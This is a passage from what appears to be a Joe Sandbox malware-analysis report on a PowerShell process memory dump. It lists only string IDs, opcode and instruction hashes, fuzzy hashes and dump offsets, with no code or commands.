                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 888322f10a429d6976f0117eb671fc32b5ce723a3317e0b213791c6ce0e78534
                                            • Instruction ID: 861578b39a89d1f0c42a35e58e65e88eaa34cec82d51c7dcab169ed0548f9ffd
                                            • Opcode Fuzzy Hash: 888322f10a429d6976f0117eb671fc32b5ce723a3317e0b213791c6ce0e78534
                                            • Instruction Fuzzy Hash: 8C31B5F1A00205DBFB348E49C542BE9F7A6AF89710F18C06ADA1D9BA51CF71DD40CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$$q$$q$$q$$q
                                            • API String ID: 0-1023332887
                                            • Opcode ID: 759c6b0d3d2e90bbfd8c35403524dedafe9cf5a812477679b168dc1e3d48ee8a
                                            • Instruction ID: 520492eddab8393db24f40f0fc8c20aeeb5c8bb54608169f40a3e80c11181b36
                                            • Opcode Fuzzy Hash: 759c6b0d3d2e90bbfd8c35403524dedafe9cf5a812477679b168dc1e3d48ee8a
                                            • Instruction Fuzzy Hash: 692150F1B1030BDFFB348E05C9416F5BBA9AF81A51F58806AEA0CCBD51C775D9A0CA91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (oq$(oq$(oq$(oq
                                            • API String ID: 0-3853041632
                                            • Opcode ID: 0241f64cb05dc93eb48440f815f5cfecc41fbce5a0e7669cf85c25a75ac1c510
                                            • Instruction ID: 22c23a5057b7ced01ddfb4dd0e0632c8b2af9c499e7ad09aa93fb3f930b284e8
                                            • Opcode Fuzzy Hash: 0241f64cb05dc93eb48440f815f5cfecc41fbce5a0e7669cf85c25a75ac1c510
                                            • Instruction Fuzzy Hash: 6EF108B1714346DFEB349F68C8447EABBA2EFC5310F14847AE6098BA91CB32D945C761
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$tPq$tPq
                                            • API String ID: 0-1392854178
                                            • Opcode ID: d522fb7a518ba24f327721bc2958511876fe3b5ef2c3b002470a6dc13919d948
                                            • Instruction ID: eac73a8f9ffd693da72dbd7aef434a4e9eca229cda838b6322cec50d956e51d7
                                            • Opcode Fuzzy Hash: d522fb7a518ba24f327721bc2958511876fe3b5ef2c3b002470a6dc13919d948
                                            • Instruction Fuzzy Hash: 74C15EB27053418FF7348A6998417BAB7A2DFC1614F14847BD609CBA83EF32D852C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q
                                            • API String ID: 0-4210068417
                                            • Opcode ID: 9ff9b5cd6191cd759ec7fae508334876a45c7a97e01bdf4c37d869de9a032cec
                                            • Instruction ID: af3cdf6a8f08d43b8f646bbb30956b4612adeacf4bc66f8c322503046852f452
                                            • Opcode Fuzzy Hash: 9ff9b5cd6191cd759ec7fae508334876a45c7a97e01bdf4c37d869de9a032cec
                                            • Instruction Fuzzy Hash: D9612AB1B013098FEB349A7998016EFB7A6EFC5610F14807AD60ECBB41DB31D966C791
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$tPq$$q
                                            • API String ID: 0-3421759962
                                            • Opcode ID: 1335478a54f5373bd17461e27c77a929c77a088203c70e8fa81f2134608c8cbc
                                            • Instruction ID: ad74a6f758a3ee642d6a46743a9e06bd03e3e4ad1739a402381313ff724b7297
                                            • Opcode Fuzzy Hash: 1335478a54f5373bd17461e27c77a929c77a088203c70e8fa81f2134608c8cbc
                                            • Instruction Fuzzy Hash: A971F8F0B51205DFEB34CE59C540BE9B7F6AF89311F28849AEA085BA51C731ED41CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$tPq$$q
                                            • API String ID: 0-3421759962
                                            • Opcode ID: b40ff1fed3585c7b85e800e8e4acab4764b2f2d05ba390de7f101af19e1e6f5f
                                            • Instruction ID: 2ff444c9cd5192004e0a4d516ee08842789fe167ae6b72b8789f0afd5f2a79cc
                                            • Opcode Fuzzy Hash: b40ff1fed3585c7b85e800e8e4acab4764b2f2d05ba390de7f101af19e1e6f5f
                                            • Instruction Fuzzy Hash: 0261E7F0B51205DFEB34CE59C940BE9B7F6AF89311F288499EA086BA50C731ED41CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q
                                            • API String ID: 0-4210068417
                                            • Opcode ID: f7cbe0bb4caf933087ff2485b0df1d879841e7a256cbdad2743accf4cd58a32e
                                            • Instruction ID: 9ac0bdad6806858e70cdb67648f825487a71bfe067a1981a68ba87a6737315e7
                                            • Opcode Fuzzy Hash: f7cbe0bb4caf933087ff2485b0df1d879841e7a256cbdad2743accf4cd58a32e
                                            • Instruction Fuzzy Hash: 5151EAF2B0021B8FEB358A6D84102FAB7A69FC5511F14907BD60ECBA10DA36C956C7B1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q
                                            • API String ID: 0-4102054182
                                            • Opcode ID: 00b015ea16db30ab346582ea148efd63fb65822de204ce3747ebb5adef871b31
                                            • Instruction ID: 5a56bce199fd620f9fbf45fdfc7757db6d2d320b07f145a938511eff462f3c8b
                                            • Opcode Fuzzy Hash: 00b015ea16db30ab346582ea148efd63fb65822de204ce3747ebb5adef871b31
                                            • Instruction Fuzzy Hash: 932168B271034A9BFB345A6E8C607A7F3DA9BC1615F34843BA60DCBB85CD75C8018361
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q$$q
                                            • API String ID: 0-4102054182
                                            • Opcode ID: 899670e77a22507dac4665ab5aaba65733e885d567046f6dd1ad7aaf638d1093
                                            • Instruction ID: b66490e0503d39314fb6922f388993bff292a413a5a7d1653942f6598a91d17c
                                            • Opcode Fuzzy Hash: 899670e77a22507dac4665ab5aaba65733e885d567046f6dd1ad7aaf638d1093
                                            • Instruction Fuzzy Hash: 87119DF1A0030ADBEF318E6689406FAFBA8AF81610F58406ADA0D97A01DF35C544CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$$q$$q
                                            • API String ID: 0-3199993180
                                            • Opcode ID: c64f216f7bd416a8a83478adc976cf2b537328d7db7702060ca3c5cbe77c4236
                                            • Instruction ID: 843880a0f90fb77c10e54de343c361ec16b85c0de2fffcfa537ecfb1b2bd3c08
                                            • Opcode Fuzzy Hash: c64f216f7bd416a8a83478adc976cf2b537328d7db7702060ca3c5cbe77c4236
                                            • Instruction Fuzzy Hash: CF012B6270939A4FE33A036948302B56BB25FC394076B80A7C246DB797CD55CC478757